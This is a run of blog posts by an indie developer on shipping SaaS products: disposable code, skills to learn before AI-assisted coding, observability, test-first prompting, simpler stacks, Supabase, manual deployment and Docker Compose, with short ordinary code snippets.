When I needed to switch to OAuth? I wrote new functions:

def login_with_google(oauth_code):
“”“Exchange Google OAuth code for user session.”“”
google_user = fetch_google_user(oauth_code)
user_id = get_or_create_user(google_user.email)
return create_session(user_id)

Notice something? I reusedcreate_session because it was generic enough. Butlogin_user? Deleted. Gone. Didn’t even hesitate.

No refactoring. No careful extraction. Just wrote the new thing and removed the old thing.

The Rules of Disposable Code

1. Small, obvious functions over big, clever classes

Classes accumulate dependencies. Functions are isolated. When you need to delete a function, you delete a function. When you need to delete a class, you delete a classand everything tangled up with it.

2. Duplication is cheaper than the wrong abstraction

I used to obsess over DRY (Don’t Repeat Yourself). Now I’m fine with a little repetition if it keeps things independent.

Two similar functions are easier to replace than one abstraction that tries to handle both cases.

3. Keep your interfaces at the boundary, not everywhere

You don’t need an interface for your database layer when you’re the only one touching it. You can always add it later when you have a reason.

Interfaces make sense at system boundaries — the edge where your code meets the world. Everywhere else, they’re just ceremony.

4. Write code that explains itself, not code that needs explanation

When something’s easy to delete, you need to understand it quickly. Clear names, simple flows, minimal indirection.

If you need to draw a diagram to explain how your authentication works, it’s probably too coupled to delete easily.

I know this is easier said than done, but it gets better as you consciously repeat it.

When Permanence Actually Matters

I’m not saying nothing should last.

Your database schema? That’s hard to change, so think it through.

Your user-facing API? Breaking that hurts customers, so be careful.

But your internal implementation? Your service layer? Your clever abstraction that makes you feel like a real engineer?

That stuff should be built like lego blocks, not concrete.

The Real Discipline

Here’s the paradox: writing disposable code takes more discipline than writing permanent code.

Permanent code lets you over-engineer. You can spend days on an abstraction and call it “planning ahead.”

Disposable code forces you to admit you don’t know the future. You solve today’s problem cleanly, knowing tomorrow might demand something different.

That’s harder. It requires restraint. It means resisting the urge to build the Grand Unified Framework when a simple function would do.

But it’s also freeing.

Because when the product changes — and it will — you won’t be buried under the weight of all your clever decisions.

You’ll just delete the old thing and write the new thing.

And keep shipping.

TL;DR:

Stop building for forever. Build for now, with the assumption that “now” is temporary. The best codebases aren’t the ones that never change — they’re the ones where change doesn’t hurt.

]]>

What every indie dev should master before asking AI to build for them

Lakshmi Narasimhan — Sun, 19 Oct 2025 00:00:00 +0000

Before AI coding assistants, I wasted months chasing the “right stack.”

React or Vue? Flask or Django? Docker or bare VPS?

I’d open fifty tabs and still end up staring at a blinking cursor.

Now, we’re in a world where you candescribe your idea and watch an AI spin up a working prototype. It feels magical — until you try to debug it.

The truth is, vibe coding only works if you understand what the AI is building for you.

Otherwise, you’re just rearranging generated code and hoping for the best.

So, before you ask AI to build your SaaS, here’s what you need to master first.

These aren’t frameworks or libraries — they’re the mental models that make AI your assistant, not your babysitter.

Version Control: Command the Timeline

I used to treat Git like a magical undo button — until it undideverything.

Even as a solo builder, Git is your safety net. Learn to branch, merge, revert, and tag with confidence.

Every “oh no” moment becomes recoverable when you know how to roll back.

🧠Pro tip:

Integrate your favorite AI tool with GitHub’sMCP. You can tell it to open PRs, summarize diffs, or write changelogs.

But here’s the catch — to delegate effectively, you need tounderstand version control first.

Also,Magitfor VSCode is an underrated gem. It makes Git feel almost fun.

Data: Model, Don’t Just Store

No SaaS survives without a solid data model. I learned that the hard way, after my “fast” prototype crawled because I hadn’t indexed anything.

Knowing how to design schemas, choose keys, and plan migrations will save you more pain than any ORM ever could.

Your data modelwill evolve. Be ready for it.

🧠AI Tip:

Discuss your schema with your LLM.

Ask,“What should I index?”,“How will this evolve?”, or“What’s the best way to handle this relationship?”

You’ll get insights that feel like having a senior engineer on call.

HTTP & APIs: Speak the Native Language

Every SaaS runs on HTTP.

Learn verbs, status codes, and what to return when things go wrong.

In my early days, I’d return 200 for everything — even errors.

Don’t do that. It makes your users (and future self) miserable.

🧠AI Tip:

Tools likeContext7 make working with APIs much easier.

And yes, keep anOpenAPI spec. It’s documentation for your future self, not just a team.

(And between us — your first SaaS might not evenneed an API. We’ll talk about that soon.)

Authentication: Shop the Shelf

I built my own login systems multiple times.

It always ended with regret and sleepless nights.

Don’t code your own auth unless you’re writing a security product.

Use your framework’s built-in module, or plug in Supabase, Clerk, or Auth0. I wrote about this:

Security is not where you show creativity.

🧠AI Tip:

LLMs can wire up cookie handling, password resets, and JWTs, but make sureyou know where your secrets live and how they expire.

Frontend Literacy: Communicate, Don’t Overcomplicate

Frontend used to terrify me. CSS felt like chaos, and every “simple” change broke something else.

Then I discovered the power of simple stacks — HTML, Tailwind, and maybe HTMX or Alpine.js.

You don’t need React to make a clean, usable product.

You just need enough literacy to connect your API to a button and make it look decent.

🧠AI Tip:

AI is terrible at design. It’ll give you perfect code for ugly UIs.

Feed it visual specs instead of vague prompts.

And if you can, learn a bit of design — not to be a designer, but to avoid obvious aesthetic crimes.

Caching: Respect the User’s Time

I once doubled my server bill because I didn’t cache anything.

Caching isn’t optimization — it’s respect.

You don’t need to master Redis or CDN tuning, but understand the concept:

store what doesn’t change, reuse what you can.

🧠AI Tip:

Ask, “Where can I add caching for quick wins?”

AI can spot bottlenecks faster than you think.

Containers & Deployment: Build Once, Run Anywhere

I used to fear Docker. It felt like wizardry.

Then I realized it’s just consistency — the same environment, everywhere.

Learn how to write a Dockerfile and deploy with Docker Compose or Fly.io.

That’s 90% of what you’ll ever need early on.

Kubernetes can wait — though it’s worth knowingwhy it exists.

🧠AI Tip:

Let the AI write your Dockerfile, but read every line.

A single bad layer can bloat your image from 100MB to 1GB.

System Design: Don’t Overbuild — Yet

When I first started learning about queues, event buses, and load balancers, I felt like I’d unlocked a hidden level of engineering.

I wanted to useeverything.

So I did — and my “simple” SaaS turned into a distributed Rube Goldberg machine.

My future self hated me for it.

Here’s the quiet truth about system design:

the more you know, the more dangerous you become.

Because knowledge tempts you to overengineer.

To solve problems you don’t have yet.

To optimize for scale that may never come.

But good design isn’t about sophistication — it’s about restraint.

It’s choosing clarity today over hypothetical performance tomorrow.

🧠AI Tip:

Ask your coding assistant to sketch asimpler version of what you have in mind.

Say, “Can this work without queues?” or “Can we handle this in-process first?”

Sometimes the best architecture is the one that fits in your head.

Observability: See Before You Panic

The most painful bugs are the invisible ones.

You can’t fix what you can’t see.

Start simple: print logs, expose /healthz, and add uptime checks.

You don’t need fancy dashboards — just awareness.

🧠AI Tip:

Ask your LLM to set up Sentry, logging middlewares, or structured logs.

AI is great at the boring setup — you handle the insights.

Shell & Scripting: Glue Everything Together

Bash saved me more times than I can count.

A simple script to restart a service, clean a directory, or back up a DB — these are invisible superpowers.

Learn your way around permissions, env vars, grep, and tmux.

This is what separates the “can’t deploy” dev from the “fixed it in 5 minutes” builder.

🧠AI Tip:

Have AI generate shell scripts — butnever run them blindly.

Understand before you execute.

Security: The Habit, Not the Skill

You might’ve noticed I didn’t give security its own section. That’s intentional.

It’s not a tool — it’s a habit.

Every time you touch authentication, data, or deployment, think:

“If this were compromised, what breaks?”

Use HTTPS. Hash passwords. Never hardcode secrets.

Most breaches come from negligence, not genius-level hacking. Something I like to call theignorance debt.

Frameworks, Languages, and Everything Else

By now, someone will say, “But what about React? Django? Go? Rust? CI/CD?”

All valid. All secondary.

Frameworks are shortcuts, not foundations.

Languages are dialects — once you understand these fundamentals, syntax becomes trivia.

Testing, CI, and cloud scaling make sense onlyafter you’ve shipped something worth scaling.

Learn these ten areas deeply, and AI suddenly becomes 10x more effective.

Because now, you know what to ask, what to skip, and when to stop it from hallucinating an entire microservice.

The Indie Dev Reality

Vibe coding isn’t about skipping the hard parts — it’s aboutsequencing them right.

AI gives you speed, but not direction.

These fundamentals are your compass.

Learn them once, and you’ll never fear new tools again.

Everything else — frameworks, language wars, fancy hosting — becomes optional flavor.

Because in the end, you don’t need to know everything.

You just need to knowenough to ship, fix, and try again.

]]>

Your SaaS Will Break — Here’s How to See It Coming

Lakshmi Narasimhan — Sat, 18 Oct 2025 00:00:00 +0000

You know that peaceful moment when you’ve just deployed your SaaS MVP?

No users yet. No traffic. Everything looksfine.

It’s the most deceptive calm in tech.

Because here’s what happens next:

Someone signs up. A few cron jobs kick in. A background task fails silently.

And you haveno clue why.

Not because you’re a bad engineer.

But because you never gave yourself eyes.

I’ve been there — staring at a blank terminal, trying to reproduce a bug I can’t see, because I didn’t bother adding even basic observability before launch.

That’s when you realize: you don’t need users to create chaos. You just need time.

Your SaaSwill break.

Something small. Something silly. Something preventable.

And when it does, you want breadcrumbs.

You don’t need Grafana dashboards or Prometheus metrics yet.

You just need awareness. A few tiny habits that make you less blind:

Log errors to stdout. Your logs are your first debugger.
Add Sentry for unhandled exceptions — because one will always sneak through.
Expose a /healthz endpoint. It’s the easiest way to check if your app is even alive.
Capture latency in middleware. You don’t need histograms; just print request times.

That’s enough.

You’re not setting up a monitoring stack. You’re giving your future self context.

You’re leaving breadcrumbs for when things go sideways.

Because when that first user says,

“Hey, your site’s kinda slow today,”

you’ll know where to look — not just what broke.

I can’t tell you how many times I’ve been grateful for a random log line I wrote months ago.

Future-me has sent past-me several thank-you notes.

So, before you chase new features or users…

Add observability.

Give yourself eyes. 👀

It’s the calmest insurance policy you’ll ever set up.

]]>

A Saner Way to Use AI for Coding

Lakshmi Narasimhan — Fri, 17 Oct 2025 00:00:00 +0000

It starts innocently. You ask your AI assistant to scaffold a module, maybe add a new API route. The code appears in seconds, looks neat, and even runs. You feel unstoppable.

Then a few days later, you’re knee-deep in functions you didn’t write, variables that seem to name themselves, and imports from packages you never meant to use. One small change breaks three files. You scroll through the diff wondering who wrote this mess. Spoiler: it was you — and your AI.

I use Augment Code mostly, but honestly, this happens with every tool. The moment you hand over the steering wheel, AI does what it does best —over-generate. It tries to impress you with completeness, not clarity.

That’s when I flipped the workflow.

Instead of saying, “write me this feature,” I started saying, “here’s the test — make it pass.”

Suddenly, everything changed. The AI stopped building castles and started laying bricks.

When you write the tests first, you define the boundaries. You decide what “done” means. The AI only fills in the minimum needed to make the tests go green. It doesn’t have permission to invent architecture. You stay in control.

This is just test-driven development (TDD), but with a twist: the AI is your junior developer. You write intent; it writes implementation.

And the result? Not just leaner code —well-tested code.

Every piece the AI touches has a corresponding test. You don’t end up with half-baked helpers or random abstractions. You end up with code that behaves exactly as you specified — and a test suite that proves it.

Funny how things come around. TDD started as a discipline for human developers decades ago — a way to enforce thoughtfulness and quality. Who knew it would become the perfect antidote to AI code chaos in 2025?

Sometimes I even take it a step further and ask the AI tosuggest the tests before I refine them. It’s a nice warm-up — like brainstorming edge cases before getting serious. You could call that the zeroth step. Maybe I’ll write about that next.

For now, try this:

The next time you reach for your coding assistant, don’t ask it to build something.

Write a failing test. Then tell the AI, “Make this pass.”

You’ll get cleaner code, stronger tests, and maybe — for the first time — a sense that you’re the one driving again.

]]>

You’re Making Your SaaS Harder Than It Needs to Be

Lakshmi Narasimhan — Thu, 16 Oct 2025 00:00:00 +0000

A few weeks ago, I spent an entire evening chasing a bug in a React component that refused to re-render.

I trieduseEffect. ThenuseMemo. Then stared at the dependency array like it had personally wronged me. Eventually, I fixed it — by restarting the dev server.

That’s when it hit me:React wasn’t made for people like me.

React was built forteams — with dedicated frontend engineers, design systems, review processes, and time to care about component hierarchies. I’m just trying to build a SaaS. Alone.

And as a solo dev, every layer of “modern architecture” feels like an extra wall between me and shipping.

I’m not great at React — mediocre, at best. But that’s the point. The tools I use shouldn’t need me to be great at them to get work done.

I don’t hate React. I hate how easily it turns small projects into puzzles.

The setup is never small: package managers, routing, build tools, state management, API layers, hydration. It’s an entire ecosystem just to render some HTML.

At some point, you stop writing features and start maintaining your own framework.

And no — AI coding assistants don’t make this any easier.

They’ll happily generate components, hooks, and entire pages for you. But they also multiply the cognitive load. You end up with auto-written code you didn’t fully read, logic you didn’t author, and bugs you can’t mentally trace.

AI helps you go faster — straight into the same wall.

When the code gets complex, you’re still the one debugging it at 1 a.m., trying to remember why useEffect depends on a variable that no longer exists.

Meanwhile, the old-school Model-View-Controller pattern — the one we abandoned because it wasn’t “modern” enough — still does the job.

Django, Rails, Laravel — these frameworks have one big thing React doesn’t:a consistent mental model. You don’t have to remember whether a component is server or client. You just write code that responds to requests and sends back HTML.

MVC assumes you’re one person who wants to move fast. React assumes you’re part of a team that can afford to slow down.

In MVC land, there’s no build step. No hydration mismatch. No npm install that randomly breaks after a week. You can teach a junior developer (or your future self) the whole stack in an afternoon.

The irony is that React is now rediscovering what MVC never forgot. Server components, data fetching, progressive rendering — all old ideas wearing new clothes.

And that’s fine. The web evolves. But if you’re an indie developer building your first or fifth SaaS, you don’t need to play catch-up with every new abstraction.

Complexity is not a sign of progress. It’s often just inertia.

Simplicity compounds. Every decision youdon’t make leaves you more energy to focus on what matters — your users, your pricing, your roadmap, your survival.

So if your stack feels heavy, it’s not your idea that’s broken. It’s your setup.

You don’t need a front-end framework to validate your business.

You need feedback. Fast.

And for that, an old-fashioned MVC stack will get you further than a “modern” one built on a mountain of npm packages.

React is powerful — no argument there. But power isn’t the same as momentum.

For indie devs, momentum wins. Every time.

]]>

If I Were Starting a New SaaS Today, I'd Do This

Lakshmi Narasimhan — Wed, 15 Oct 2025 00:00:00 +0000

Most SaaS projects fail because founders spend weeks building scaffolding instead of features. Here’s how to skip the boilerplate and ship fast.

I’ve built half a dozen SaaS products. Some succeeded. Most failed. But the failures taught me something critical:ideas don’t die from competition—they die from delayed launches.

You lose weeks setting up databases, authentication, APIs, file uploads, and admin panels before writing a single line of actual product code. By the time you’re ready to ship, momentum is gone.

If I were starting today, I’d skip all that. I’d use Supabase—and I’d ship an MVP in days, not months.

The Problem with “Building from Scratch”

Building foundations feels productive. You’re writing code, making decisions, setting up infrastructure. But you’re not building anything users can touch.

Auth alone consumes days: password hashing, session management, password resets, email verification. Then you need database migrations, API routes, input validation, error handling. Before you know it, you’ve burned two weeks on scaffolding.

That’s two weeks you could’ve spent validating whether anyone actually wants what you’re building.

Why Supabase Changes Everything

Supabase isn’t just a database. It’s a complete backend—authentication, storage, real-time updates, edge functions—packaged as a single platform. And unlike Firebase, it’s built on PostgreSQL, so you’re not locked into proprietary tech.

PostgreSQL Foundation

Every table you create automatically gets REST and GraphQL APIs. No backend needed. Query directly from your frontend with row-level security enforcing permissions at the database layer.

javascript

// Fetch user's tasks directly from the frontendconst{data,error}=awaitsupabase.from('tasks').select('*').eq('user_id',userId);

You still get full PostgreSQL power: triggers, extensions, stored procedures, joins, indexes. It’s not a toy database—it’s enterprise-grade Postgres with a developer experience that doesn’t suck.

Authentication That Just Works

Built-in support for email/password, magic links, OTPs, OAuth (Google, GitHub, etc.), and custom SSO. User records live in your Postgres schema. Add custom fields. Create relationships. No vendor lock-in.

javascript

// Sign up with email/passwordconst{user,error}=awaitsupabase.auth.signUp({email:'user@example.com',password:'secure-password'});// Magic link (passwordless)awaitsupabase.auth.signInWithOtp({email:'user@example.com'});

No JWT libraries. No session stores. No password reset flows. It’s handled. You write product code.

Real-Time Updates Without Redis

WebSocket-based subscriptions give you instant updates on table changes. No message brokers. No Kafka. No Redis pub/sub.

javascript

// Subscribe to new messagessupabase.channel('messages').on('postgres_changes',{event:'INSERT',schema:'public',table:'messages'},(payload)=>{console.log('New message:',payload.new);}).subscribe();

Insert a row in your messages table? All connected clients receive it instantly. Build chat, notifications, live dashboards—without standing up infrastructure.

Row-Level Security

Database-level authorization policies replace entire backend authorization layers. One policy line defines who can access what.

sql

-- Users can only see their own tasksCREATEPOLICY"Users see own tasks"ONtasksFORSELECTUSING(auth.uid()=user_id);

Policies compose. Multi-tenant? Add tenant_id checks. Admin override? Add role conditions. Security moves from scattered backend checks to centralized, auditable rules.

Storage & Edge Functions

Native file upload handling with access rules compatible with row-level security. TypeScript-based edge functions deploy in seconds for webhooks, scheduled jobs, or integrations.

javascript

// Upload file with automatic access controlconst{data,error}=awaitsupabase.storage.from('avatars').upload(`${userId}/avatar.png`,file);// Edge function for webhook processingimport{serve}from'https://deno.land/std/http/server.ts'serve(async(req)=>{constpayload=awaitreq.json();// Process webhookreturnnewResponse('OK',{status:200});});

The Developer Experience You Deserve

The CLI, dashboard, SQL editor, and APIs feel cohesive. You’re not juggling five different tools with five different authentication methods. Everything integrates.

Need to see your database? Open the dashboard. Want to test a query? Use the SQL editor. Ready to deploy a function?supabase functions deploy. It just works.

Open Source & Portability

Unlike Firebase, Supabase runs self-hosted via Docker Compose. Start on their hosted platform. Move to self-hosted if you outgrow it. Same codebase. Same developer experience.

You’re not locked in. Your data is Postgres. Your auth is Postgres. Your files are S3-compatible storage. If Supabase disappears tomorrow, you can migrate. Try doing that with Firebase.

Ship Fast, Own Your Stack, Avoid Unnecessary Complexity

This is the indie developer playbook: start small, ship fast, scale naturally. Supabase embodies that philosophy.

You’re not choosing between a custom backend and a proprietary platform. Supabase sits in the middle—powerful enough for serious applications, simple enough to start with one table and an auth flow.

If I were starting a SaaS today, I’d skip the scaffolding. I’d use Supabase. And I’d ship in days—not weeks.

Because the best way to validate an idea isn’t to build perfect infrastructure. It’s to put something in front of users and learn whether they care.

Supabase gets you there faster. And when you’re running solo, speed is everything.

]]>

Don’t write a CD pipeline yet

Lakshmi Narasimhan — Tue, 14 Oct 2025 00:00:00 +0000

We love to automate things we barely understand. I’ve seen it in every team I’ve worked with — the moment an app runs on someone’s laptop, the next conversation is, “Let’s set up CI/CD.” Jenkins, GitHub Actions, ArgoCD — whatever’s shiny at the moment. It feels like progress. But most of the time, it’s premature optimization disguised as productivity.

If you’ve never deployed your app by hand, you don’t deserve automation yet. Harsh? Maybe. But true.

Because until you’ve felt the friction of deployment — the SSH into your server, the environment variables you forgot to set, the database migration that didn’t run, the static files that didn’t refresh — you have no idea what you’re automating. You’re just encoding mystery and hope into your YAML.

Every good pipeline starts as a manual ritual.

You push code.

You build it.

You ship it.

You see what breaks.

You fix it.

You repeat.

Somewhere along the way, you start noticing patterns. “I always forget this one step.” “This command takes too long.” “This config should be parameterized.” That’s when automation makes sense — when it saves you fromknown pain, not imagined complexity.

A lot of engineers treat automation as a status symbol. If it’s not fully automated, it’s “not professional.” But automation without understanding is just faster failure. A broken pipeline that hides its steps is worse than no pipeline at all. At least with manual deploys, you see what’s happening.

When you deploy by hand, you learn how your systembreathes. You watch logs scroll. You wait for the container to restart. You notice how long migrations take. You catch subtle things — an environment variable typo, a port binding issue, a permissions error — things that a pipeline will fail silently on, leaving you staring at a red ❌ with no clue why.

It’s like driving a stick shift before an automatic — once you’ve done it, you understand the gears. You feel the engine. Later, when the system drives itself, you’ll still know when something’s off.

I’ve seen teams automate their deploys too early and then spend weeks debugging the automation instead of the app. They ship to staging, something breaks, and nobody knows which part of the pipeline did it. It’s a house of cards built on blind trust.

Manual deploys are humbling. They slow you down — in a good way. They expose weak spots. And they give you confidence that you can recover when things go sideways. That’s the foundation you want before you bring in CI/CD.

Once you’ve done it manually a few times, automation becomes obvious. You’ll know which parts to script, which to leave flexible, and which deserve a human eye. That’s when your pipeline becomes a force multiplier instead of a black box.

So before you open GitHub Actions, before you write your first .yaml, do it yourself. SSH into the box. Run the commands(Or run kubectl/helm. Pick your poison). Watch the logs. Feel the pain. Because once you understand it deeply, you’ll automate with empathy — not arrogance. And that’s the kind of automation that lasts.

]]>

The Hidden Tax Slowing Down Indie SaaS Builders

Lakshmi Narasimhan — Mon, 13 Oct 2025 00:00:00 +0000

We’ve been sold a lie — that every modern web app needs to be a “real app.”

You know the drill: a dedicated frontend built with React or Next.js, an API-only backend, and a separate database layer neatly tucked behind it.

It looks professional. It feels scalable.

But for indie developers building SaaS products, it’s a trap.

When you’re a solo founder or a two-person team trying to validate an idea, the 3-tier architecture —frontend + API + database — is rarely your friend.

It’s a cognitive and operational tax disguised as “best practice.”

Think about what you’re actually doing when you follow this pattern:

You spin up a frontend repo with its own dependencies, build system, routing, and deployment.
You spin up a backend API that must serialize, authenticate, and talk over HTTP just to move data between two systems you control.
You wire in your database and ORM, create migrations, and write serializers or DTOs to keep everyone happy.

That’s three moving parts. Three deploys. Three layers of bugs.

For what?

Most MVPs don’t need “layers.” They needfeedback.

The 3-Tier Pattern Serves Organizations, Not Builders

Here’s the truth: this architecture exists to serveorg structure, not product velocity.

Big companies need clear boundaries because they have teams:

Frontend team
Backend team
Ops team

The 3-tier pattern is basically Conway’s Law in code form — architecture mirroring the communication lines of large organizations.

But when you’re building your first SaaS, youare the team.

You don’t need boundaries between yourself. You need flow.

Every layer you add between user action and business logic slows that flow down. Every abstraction adds cognitive overhead. You spend more time plumbing than building.

The Cognitive Overload of “Modern”

React and friends were meant to solve complexity. Ironically, they’ve become a source of it.

A simple button click in React is rarely just a button click. It’s:

A component that imports five dependencies.
A state hook managing a boolean.
A context provider that tracks global state.
An API call wrapped in a useEffect that must sync with local cache.

You could’ve just written:

and been done with it.

React, Vue, Svelte — they’re incredible for rich UIs, but they demand constant context switching. JSX, state management, bundlers, APIs, hydration. Each decision compounds.

If your goal is toship a paid product, not a code showcase, that complexity is friction.

The Modern “Backend-First” Stack

Choosing a simpler path doesn’t mean going back to sticks and stones.

HTML isn’t dead. It’s evolved.

You can build interactive, modern interfaces right inside your backend using tools like:

HTMX – progressive HTML-over-the-wire, no full reloads.
Alpine.js – small, declarative reactivity.
Tailwind CSS – utility-first design system that makes you fastand consistent.

Together, they form a sweet spot:

You writeHTML templates with embedded actions.
You sprinkleJS only where it matters.
You serve it directly from your backend.

No API layer. No hydration. No build pipeline. Just requests, responses, and users getting what they came for.

You still get interactivity, animations, modals, and dynamic UI updates — but with a tenth of the cognitive load.

This means faster iteration cycles, smaller deployments, and drastically fewer bugs.

Your stack lives in one repo.

Your deploy command is one line.

Your brainspace is freed up for actual product thinking.

“But What About Scaling?”

That’s the wrong question for 95% of MVPs.

You don’t have a scaling problem until you haveusers.

Startups die from lack of traction, not lack of microservices.

If you ever outgrow this setup — great. Peel off layers later.

Turn your backend endpoints into APIs, move your UI to React, or even split your services. By then you’ll have revenue, validation, and real data to justify the refactor.

Premature architecture is just another form of procrastination.

The Hidden Benefit: Mental Clarity

Beyond performance and simplicity, there’s a more subtle gain:cognitive freedom.

When your stack is unified, your brain can focus on the user flow instead of the glue code.

You can see everything — UI, logic, and data — in one place.

It feels cohesive.

You’re not juggling three languages, four toolchains, and two servers.

You’re just shipping.

And that matters more than any buzzword architecture ever will.

The Takeaway for Indie SaaS Builders

You don’t get extra points for being complex.

You get rewarded for being useful.

A simpler stack means:

Faster idea-to-demo time.
Easier onboarding if you add help later.
Fewer mental tabs open.
Lower hosting costs.
And most importantly — fewer excuses to delay launch.

You can build 80% of what you think you need with plain HTML templates, Tailwind, and a bit of JS. Add Alpine for interactivity, HTMX for AJAX-like flow, and you’ll rival the speed of any React-Next duo out there.

Stop architecting for imaginary scale. Start shipping for real users.

Because the faster you close the gap betweenidea andfeedback, the faster you learn, iterate, and make money.

And that’s the only scale that matters when you’re small.

]]>

How indie devs can vibe code fast without sinking their own ship

Lakshmi Narasimhan — Sun, 12 Oct 2025 00:00:00 +0000

There’s a quiet war inside every indie developer I know.

One part of you just wants tobuild.

To open the editor, follow your curiosity, and see something real come alive on screen.

That’s thevibe coder in you — the part that moves fast, trusts intuition, and believes momentum creates clarity.

Then there’s the other voice.

The one whispering about tests, migrations, rate limits, and all the invisible things that keep production from burning down.

That’s theengineer in you — the part that’s seen systems crumble and knows “we’ll fix it later” often means “we’ll fix it never.”

Most of us swing between the two.

Too much vibe, and your SaaS turns into a spaghetti monster that terrifies future you.

Too much discipline, and you’ll design yourself into paralysis before your first user ever logs in.

The balance isn’t about finding the perfect middle ground — it’s abouttiming.

Phase 1: Vibe for Momentum

When you’re starting, you don’t need architecture.

You needproof. Proof that the idea resonates, that the workflow feels good, that you can sustain your own interest long enough to see it through.

Ship something messy.

Inline CSS. Hardcoded configs. A Docker Compose file running on your laptop.

If it helps you learn or get feedback faster, it’s good enough.

At this stage, your goal is to find thepulse of your product — the heartbeat that makes it worth polishing later.

Phase 2: Add Discipline for Survival

Once someone uses it — or worse, depends on it — your job changes.

You’re no longer hacking; you’re maintaining.

That’s when guardrails matter.

Not enterprise-level bureaucracy, but the indie essentials:

rate limits, structured logs, CI checks, and a migration plan that won’t kill your data.

Each layer of success earns another layer of discipline.

That’s how you scale without killing your momentum.

The Indie Balance

Vibe coding isn’t reckless.

It’s how you get to momentum.

But discipline is how you keep it.

The real art of indie software isn’t just writing good code.

It’s knowingwhen to write which kind of code.

TL;DR:

You start as an artist. You evolve into an engineer.

The trick is not to silence either voice — just let them take turns driving.

]]>

AWS Is Overrated

Lakshmi Narasimhan — Sat, 11 Oct 2025 00:00:00 +0000

If you’re an indie dev building your first SaaS, AWS is not your friend.

It’s a maze of services, dashboards, and acronyms pretending to make you productive while quietly billing you for curiosity.

Sure, it’s “the industry standard.” But here’s the thing: you’re not Netflix. You’re not Stripe. You don’t need fifteen managed services to ship an MVP. You just need one working prototype in front of users.

When I started shipping my own SaaS projects, I defaulted to AWS too. Everyone said it was the “serious” choice. I spun up EC2s, tinkered with VPCs, IAM roles, and CloudWatch dashboards.

Two weeks later, my app still wasn’t live. But my bill was.

That’s when it clicked. AWS is optimized forscale, notspeed. It’s designed for teams with DevOps pipelines, budgets, and compliance officers. Indie devs have none of those.

Here’s the real problem:

AWS makes youfeel productive because it has a service for everything.

But it slows you down because you end upassembling infrastructure instead of shipping software.

You’re busy wiring VPCs while your users are waiting for a login page.

If you’re building your first SaaS, you’re better off with:

Render orFly.io for fast deploys.
Railway,Supabase if you love simplicity.
DigitalOcean app platform
Or even your ownK3s box on a $30 DigitalOcean droplet if you like to tinker.(More on this in future posts)

You’ll have full control, predictable costs, and a deploy story you can explain in a single sentence.

That’s what matters at your stage — not five-nines availability across three regions.

AWS will always have its place. It’s incredible at running serious workloads, regulated systems, and multi-tenant platforms at scale.

But for indie devs trying to launch, learn, and iterate fast — it’soverkill.

Use the simplest stack that lets you ship.

Add complexity only when success forces you to.

Because nothing kills momentum faster than debugging IAM policies instead of building features.

TL;DR

If you’re a solo founder or small team, your advantage isn’t scale — it’s speed.

Don’t trade that away for a cloud that was never built for you.

I share one short post daily-ish for productive indie developers — how to ship faster, cheaper, and saner. Subscribe if that’s your vibe.

]]>

Why Your SaaS Needs a Docker Compose Setup Even If You’re Just One Person

Lakshmi Narasimhan — Fri, 10 Oct 2025 00:00:00 +0000

If you’re building a SaaS solo, the biggest productivity killer isn’t writing code — it’ssetting up your damn environment.

You know the story:

You clone your repo on a new laptop or spin up a new dev box, run flask run or uvicorn main:app –reload, and boom — connection refused on localhost:5432.

Postgres isn’t running.

Your .env file is half missing.

Supabase changed a port.

And now you’re googling “how to reset a Postgres user password” for the third time this month.

That’s why I’ve stopped messing around with manual setups — and started containerizing mylocal environment usingDocker Compose.

Not because it’s trendy.

Because it’s the only way to guarantee I can pull, build, andrun my app in under a minute.

The indie dev reality

As solo devs, we move fast. We don’t have infra teams or onboarding docs. Most of our systems live in muscle memory and terminal history.

That’s fine when you’re in the groove — until you need to:

Revisit a project after a few months.
Share it with a collaborator.
Spin it up on a new machine.
Or just fix a quick bug and realize nothing runs anymore.

A solid local setup is like documentation that actually works.

Docker Compose is the simplest way to get there.

Why Docker Compose?

It’s not about “microservices” or “container orchestration.” Ignore that stuff.

Compose is just a YAML file that says:

“Here’s everything my app needs — run it all together.”

You can define your web app, Postgres, and even Supabase’s local stack if you want to mirror production closely.

When you run docker compose up, everything spins up consistently — same versions, same ports, same config — every time.

It’s reproducibility for humans.

The minimal example (Python + Postgres)

Let’s say you’re building a FastAPI app that talks to Postgres.

Here’s a dead-simple docker-compose.yml to make your life easier:

link to the gist

And a Dockerfile to go along with it.

Link to the gist

That’s it.

Now you can run your entire stack with one command:

docker compose up

Your Python app connects to Postgres instantly.

No need to brew install, no weird port conflicts, no “is Postgres running?” guessing game.

Want to mirror Supabase locally?

If you’re usingSupabase in production but want to run locally, Supabase has its own CLI that uses Docker under the hood.

You can spin up a near-production clone with:

supabase start

That’ll run Postgres, API, auth, and storage locally in containers — no manual setup required.

It’s heavier, but it’s great if you’re testing row-level security, triggers, or anything that depends on Supabase’s stack.

But isn’t Docker heavy?

Yeah, a little.

The first time you pull images, it’ll download a few hundred MB. After that, it’s fast.

And honestly, the alternative is worse — debugging inconsistent environments and broken local databases.

The real magic isn’t that it’s fast — it’s that it’sreliable.

If you take a break from your project for a month, you can come back and it’ll just work.

That’s worth the disk space.

Bonus: the same setup works for production

Here’s the underrated part — once you have this docker-compose.yml, you’re halfway to a production deployment.

You can:

Build your app image with docker compose build api.
Push it to a registry like Docker Hub or GitHub Container Registry.
Deploy it to Fly.io, Render, Railway, or your VPS — all of which happily accept a pre-built Docker image.

That means yourlocal setup = production setup.

No “works on my machine,” no separate Heroku config, no hand-tuned server differences.

You’re testingexactly what you’ll ship.

For example, to build your image for deployment:

docker compose build api
docker tag yourapp_api your-registry.com/yourapp:latest
docker push your-registry.com/yourapp:latest

Then you can run it anywhere with:

docker run -p 8000:8000 your-registry.com/yourapp:latest

This alignment — same Dockerfile, same Compose config — is what makes deployment predictable, even as a one-person team.

Quality-of-life improvements

Once you’ve got Compose running smoothly, you can make it even nicer:

1. Add a Makefile or script for one-command startup:

make up

Your Makefile contents:

up:
docker compose up --build

2. Add a seed script for your DB:

docker compose exec db psql -U dev -d app -f seeds.sql

3. Run tests in the same containers:

docker compose run api pytest

You now have a full, consistent local dev environment thatfeels like production, without the cloud bill.

The point isn’t Docker — it’s repeatability

You’re not doing this to “learn containers.”

You’re doing it because your time is too valuable to waste on setup chores.

A docker-compose.yml file is the indie dev version of a safety net.

You can drop your laptop, clone your repo on a new one, and be productive in 60 seconds flat.

And when it’s time to deploy?

You’re already 90% there.

TL;DR

Your SaaS deserves a repeatable local setup.
Docker Compose makes it dead simple for Python + Postgres (and Supabase).
It doubles as your build foundation for production images.
You’ll thank yourself every time you reopen an old project or deploy something new.

It’s one of those rare decisions that’s both practicaland future-proof.

